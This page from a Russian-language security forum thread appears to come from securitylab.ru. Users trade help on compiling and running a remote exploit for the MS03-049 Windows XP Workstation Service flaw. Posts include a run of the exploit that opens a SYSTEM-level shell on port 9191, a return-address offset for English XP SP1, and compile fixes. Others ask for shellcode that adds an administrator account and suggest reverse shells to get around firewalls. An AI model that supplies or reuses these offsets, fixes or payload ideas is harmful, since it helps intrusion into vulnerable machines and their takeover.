Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: Пред. 1 ... 5 6 7 8 9 ... 11 След.
RSS
Microsoft Windows XP Workstation Service Remote Exploit (MS03-049)
 
2 Darvin: скинь мне проект... у мя под VC.NET проблем с RECVTIMEOUT нет... просто компилится, но не пашет... мот твой 0349.c правильнее и после компиляции запашет - потом результат скину.

straus@list.ru
 
Хотя бы под Новый год скиньте откомпиленную версию!
straus@list.ru
 
Цитата
nashi chitaut пишет:
Хотя бы под Новый год скиньте откомпиленную версию!
straus@list.ru
Мож еще спину вареньем намазать? Лентяи...
Ворье блин растет (с)Goblin
 
2 koras: да я же грю, не получается - могу дать не кастрированный сырец, который я исправил и который компилится, НО выкидывает ошибку... че сложного-то, я же говорю, что я не полный лох..., я как и все сначала пытался сам все исправить... исправил по мере сил...НО
:(
 
Ну значит фигово разобрался... Разбирайся дальше.
Все разбирались сами, и я тоже. Доков полно, как и рабочих сплоитов, на к-рых можно изучить принципы, особенно под stack overflow как здесь...
BTW почти каждая вторая XP с открытым нетбивасом ломается на ура (;
 
Подскажите что делать!Ругается на RECVTIMEOUT!Да доков полно,но это не могу найти.
 
Странно, а у меня ни на что не ругается - наверное кто-то из нас тупит :)

Build log was saved at "file://c:\xxx\wks\Release\BuildLog.htm"
wks - 0 error(s), 0 warning(s)

---------------------- Done ----------------------

    Build: 1 succeeded, 0 failed, 0 skipped

Взял интереса ради этот исходник - пофиксить его заняло минут 7, добавить аглицкую XP SP1 пара секунд:

C:\xxx\wks\Release>wks -t0
Possible targets are:
============================
1) Window XP + SP0 [Rus]
2) Window XP + SP0 + Rollup [Rus]
3) Window XP + SP1 [Rus]
4) Window XP + SP1 + Rollup [Rus]
5) Window XP + SP1 [Eng]
6) Crash all

Ну а вот прогонка:

C:\xxx\wks\Release>wks -h 192.168.100.51 -t 5

[+] Prepare exploit string
[+] Sleep at 2s ...
[+] Setting up IPC$ session...
[*] IPC$ session setup successfully!
[+] Sending exploit ...
[+] Initialize WSAStartup - OK
[*] Socket initialized - OK
[+] Try connecting to 192.168.100.51:9191 ...
[*] Connected to shell at 192.168.100.51:9191

Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>\whoami
\whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>

Как видно все работает на аглицкой, а значит, еси оффсеты верны, то будет работать и на русской, НО я очень сильно сомневаюсь что оно будет работать против русской XP SP0 при неизменном шеллкоде, т.к. есть грабли с SP0 с искалечиванием байтов со значениями > 0x80, что прекрасно видно,  если запустить деграббер, а не орать тут что ниче не компилится и не работает :) Но есть решение и этой проблемы, как и универсальный оффсет против SP0&SP1:

MS03-049 buffer overflow exploit by *********
Targets: Windows XP SP0 and SP1

Usage: workst <ip>

Так что всем тем, кто орет, что ничто не компилится и не работает - в школу епта )))
 
Цитата
r00t пишет:

Взял интереса ради этот исходник - пофиксить его заняло минут 7, добавить аглицкую XP SP1 пара секунд:

C:\xxx\wks\Release>wks -t0
Possible targets are:
============================
1) Window XP + SP0 [Rus]
2) Window XP + SP0 + Rollup [Rus]
3) Window XP + SP1 [Rus]
4) Window XP + SP1 + Rollup [Rus]
5) Window XP + SP1 [Eng]
6) Crash all

Ну а вот прогонка:

C:\xxx\wks\Release>wks -h 192.168.100.51 -t 5

[+] Prepare exploit string
[+] Sleep at 2s ...
[+] Setting up IPC$ session...
[*] IPC$ session setup successfully!
[+] Sending exploit ...
[+] Initialize WSAStartup - OK
[*] Socket initialized - OK
[+] Try connecting to 192.168.100.51:9191 ...
[*] Connected to shell at 192.168.100.51:9191

Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>\whoami
\whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>
выложи плз сюда свои рабочие оффсеты или скинь на peacemaker@ukrpost.net
 
Я русские оффсеты не менял т.к. все равно не на чем испытывать, апод аглицкую - общеизвестный оффсет в wkssvc.dll

"Window XP + SP1 [Eng]" 0x7518A747

А с SP0 просто подстановкой другого оффсета проблему не решишь, т.к. причина сложнее(см. предыдущий пост). Тут  нужно использовать технику ниндзя :)) Это не шутка btw )))
 
Может я и туплю,но ошубку выдает :
Error c:\lcc\projects\wks.c: 172  undeclared identifier 'RECVTIMEOUT'
Warning c:\lcc\projects\wks.c: 172   possible usage of RECVTIMEOUT before definition
Я понимаю,что у тебя все получается!Ну а где я ошибаюсь?Я не спец,но разобраться хочу!
 
abvas
Не знаю что ты там такое перемудрил, если RECVTIMEOUT в самом начален определен:

#define  RECVTIMEOUT        & nbsp; 1
 
Можно ли при помощи этой уязвимости выполнить какой-нибудь код на системе без открытия шелла? Например создать пользавотеля, или закрыть сервис, а потом шелл открывать???
 
Ну не могу сам компильнуть!!Выдает ошибки(не силен я в С).Легко писать:' Разбирайся дальше'.Разбирусь на примере.Не прошу exe-шник-скинте исходники.Поковырую - найду где ошибался.
abvas@mail.ru
 
SpAuT
Да
 
Наверное я супер доход, но я до сих пор не могу скомпилить эту херь, хоть намекните, че надо-то епт...
 undefined reference to _NetAddAlternateComputerName

[IMG]http://www.securitylab.ru/forum/smileys/smiley19.gif[/IMG] [IMG]http://www.securitylab.ru/forum/smileys/smiley19.gif[/IMG]
 
Цитата
Гость пишет:
У меня только С++ Builder 3.0 под рукой есть, ничего более нового достать не могу :( Ни компилится никак, ругает файл mswsock.h (SOCKET cann't start a parameter decalration) и т.д, так вот, неужели никак в ЭТОМ компиляторе мне его не собрать?
В музее напрокат взял?
 
r00t не мог бы ты помочь мне сгенерировать шеллкод?типа не чтоб порт открывался а чтоб создавался юзер, а потом переводился группу администраторов.
 
А может кто-нибудь рассказать как самому shell написать? А то такое ощущение что на некоторых компах shell код выполняется, а порт, который он хочет открыть, закрыт каким-нибудь файерволом. Достаточно ли здесь выполняемого кода на asme?
 
Rondo
А разве такого шеллкода нет? :\ Мне влом помогать тем, кого ломает самому разбираться, так что в гугль!

unkown
Ну попробуй засунуть туда реверсшелл... А код в топике против удаленной XP SP0 с залогиненым юзером работать не должен - такая специфика...
 
Anger
Проблема в херовом понимании того, что делаешь.
Страницы: Пред. 1 ... 5 6 7 8 9 ... 11 След.
Читают тему (гостей: 5)